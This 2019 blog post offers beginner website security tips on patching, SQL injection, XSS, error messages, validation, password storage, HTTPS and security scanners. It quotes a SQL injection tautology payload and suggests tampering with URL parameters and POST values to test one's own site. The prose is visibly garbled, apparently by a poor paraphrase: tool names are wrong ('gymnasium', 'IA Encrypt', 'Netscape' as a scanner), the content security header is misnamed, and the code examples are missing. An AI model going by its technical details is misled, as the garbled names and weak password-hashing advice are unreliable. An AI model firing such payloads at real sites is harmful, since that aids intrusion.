Sunday, 6 January 2019

How to secure website

how to secure website
How to secure website

01. Keep the software updated

This may seem obvious, but to ensure that all software is up-to-date to keep your site safe, it's important. This server applies to the operating system and any software that is running on your websites, such as CMS or forums. When software security holes are found in the software, hackers try to misuse them.

If you are using a managed hosting solution, you do not have to worry about implementing a security update for the operating system, because the hosting company should take care of this.

If you are using third-party software such as a CMS or a forum on your website, then you should ensure that you are quick to implement any security patches. The mailing list of most vendors or the RSS feed is the description of any website security issues. When you log in, WordPress, Umbraco and many other CMS inform you of available system updates.

Many developers use tools such as composer, npm, or RubyGems to manage their software dependency, and are not paying any attention to the security vulnerabilities that you see in the dependent package, among the easiest ways of getting caught Is one. Ensure that you maintain your dependency and use tools like gymnasium to get automatic alerts when one of your components declares vulnerability.

  02. Watch Out For SQL Injection

SQL injection attacks occur when an attacker uses a web form field or URL parameter to access or manipulate your database. When you use standard Transact SQL, it is easy to unknowingly insert a bad code into your query, which can be used to change tables, get information and delete data. You can easily prevent it from always using the parameters you have asked, most of the web languages have this feature and it is easy to implement.

Consider this question:
If an attacker has changed the URL parameter to pass in 'or' 1 '=' 1, then the query will look like this:

Since '1' is equal to 1 ', this can add an additional query at the end of the attacking SQL statement which will also be executed.

You can fix this by explicitly parameterizing this query. For example, if you are using MySQL in PHP, then it should become:
how to secure website
how to secure website
How to secure website

03. Rescue from XSS attacks

Cross-site scripting (XSS) attack injects malicious JavaScript into your pages, which then runs in your users' browsers, and can change the page's content, or steal the attacker back. For example, if you show comments on a page without verification, an attacker might present script tags and javascript comments, which can run in every other user's browser and steal their login cookies, from which The attack is allowed to take control of each account. Users who saw the comment You need to make sure that users can not inject the active JavaScript content into your pages.

This is a matter of special concern in modern web applications, where pages are now mainly created from user content, and in many cases generate HTML and then interpreted by front-end frameworks such as Angular and Amber. These frameworks provide many XSS security, but by combining server and client rendering, new and more complex attack signals are also generated: Not only JavaScript is being effected in HTML, but you can also inject those content as well. Helpers who will run code by inserting angular instructions or using amber.
how to secure website
The key here is how your user-generated content can avoid the limits you expect and can be interpreted by the browser as something else you wanted. This is similar to the defense against SQL injection. When HTML is dynamically generated, use a function that explicitly changes the changes you are looking for (e.g., use element.setAttribute and element.textContent, which by default, the browser Rather than by element. In your templating tool that automatically automates appropriate, instead of ending strings or setting raw HTML content.
how to secure website
Another powerful tool in XSS Defender's toolbox is the Content Protection Policy (CSP). CSP is a header that can return your server, which tells the browser how and how JavaScript has been executed in the page, for example, to stop running any scripts not hosted on your domain. Disable inline JavaScript, or disable eval (). Mozilla is an excellent guide with some example configurations. This makes it difficult to work for an attacker's script, even if they can bring them to your page.
how to secure website

04. Beware of error messages

Be careful how much information you give in your error messages. Provide only the minimum errors to your users, to ensure that they do not leak secrets on your server (such as API key or database password). Do not provide full exception details, because they can make complex attacks like SQL injection easier. Keep detailed errors in your server logs, and show only users the information they need.
how to secure website

05. Validity on both sides

Verification should always be done on both browser and server-side Browsers can catch simple failures like compulsory fields which are empty and when you enter text only in a field. However, they can be circumvented, and you should make sure that you check these verifications and deep verification for the server side because failing to do so can cause malicious code or scripting code to be entered in the database or in your website. Can produce undesirable results.

06. Check your password

Everyone knows they should use complex passwords, but that doesn't mean they always want to use it.

Enforcing password requirements such as a minimum of eight characters, including an uppercase letter and number.

Passwords should always be stored as encrypted values, preferably using a one-way hashing algorithm, such as SHAs using this method. Additional information security for this, this password is a good idea.

In the event of someone hacking in and stealing your passwords, using decrypting them is possible. The best someone can do attack on an attack on the attack or brute force attack, essentially guessing every combination When using salted passwords, the process of cracking is too slow as every guess has to be hashed separately for every salt + password which is computationally very expensive.

Thankfully, many CMSes provide user management out of the box with a lot of these website security features in built-in, though some configuration or extra modules for salted passwords (pre-Drupal 7) or minimum password strength use to set. If you are using .NET then it's worth using membership providers as they provide very configurable, inbuilt website security and readymade controls for login and password reset.

07. Use HTTPS

HTTPS is a protocol used to provide security on the Internet. HTTPS guarantees that users are talking to the server they expect, and that other people can not stop or change the content they are viewing in transit.

If you have anything that your users want personal, it is highly appropriate to use HTTPS only to distribute it. Of course, this means that the credit card and login page (and the URLs they submit) but are usually very high on your site. A login form will often set a cookie for example, which is sent to your site with every other request that creates a logged-in user and used to authenticate those requests. This stolen an attacker will be able to completely copy a user and handle his login session. To defeat such attacks, you almost always want to use HTTPS for your entire site.

It is no longer as difficult or expensive as it once was. IA Encrypt offers a completely free and automated certificate, which will require you to enable HTTPS and to set it up for you, extensive community tools are available on existing platforms and platforms.

Specifically, Google has announced that if you use HTTPS, it will also benefit you in SEO ranking, they will promote you in search rankings. Unsafe HTTP is on its way, and now is the time to upgrade.

Already using HTTPS everywhere? Go ahead and look at the installation of HTTP Strict Transport Security (HSTS), an easy header that you can add to your server's responses to eliminate unsafe HTTP for your entire domain.

09. Get website security tool
Once you feel that you have done everything, it's time to test your website security. The most effective way to do this is through the use of certain website security tools, which are often referred to as short test penetration or pen testing.

There are many commercial and free products to help you with it. They work for script hackers on a common basis in which they test all known exploits and try to compromise your site using some of the previous methods such as SQL injection.

Some free tools that are worth seeing:

Netscape (Free Community Edition and Trial version available). Good for testing SQL injection and XSS
OpenVAS claims to be the most advanced open source security scanner. Good for testing weak vulnerabilities, currently over 25,000 are scanned. But it can be difficult to set up and install an OpenVAS server which runs on * nix only. OpenVAS is Nessus's fork before it becomes a closed-source commercial product. (free online check). To quickly report a tool that is mentioned above the security headers (such as CSP and HSTS) a domain has enabled and correctly configured.
Ex-ante XSS Explicit Framework is a tool for OWASP (Open Web Application Security Project) that includes a huge selection of examples of an XSS attack, which you can run to confirm that your site's input is weak in Chrome, Firefox and IE or not.
Results from automated tests can be difficult because they present a wealth of potential issues. The important thing is to focus on the important issues first. Usually, each issue reported comes with a good explanation of potential vulnerability. You might find that some medium / low issues are not a concern for your site.

There are a few more steps you can take to manually compromise your site by making changes to POST / GET values. A debugging proxy can help you because it allows you to intercept the value of the HTTP request between your browser and the server. A popular freeware application called Fiddler is a good starting point.

So should you try to make a change to the request? If you have pages that should only be visible to a logged user, try changing URL parameters like user IDs, or cookie values in an attempt to see details of another user. There is another field form worth testing, which is changing the POST value to try to submit the code to CST or to upload a server-side script.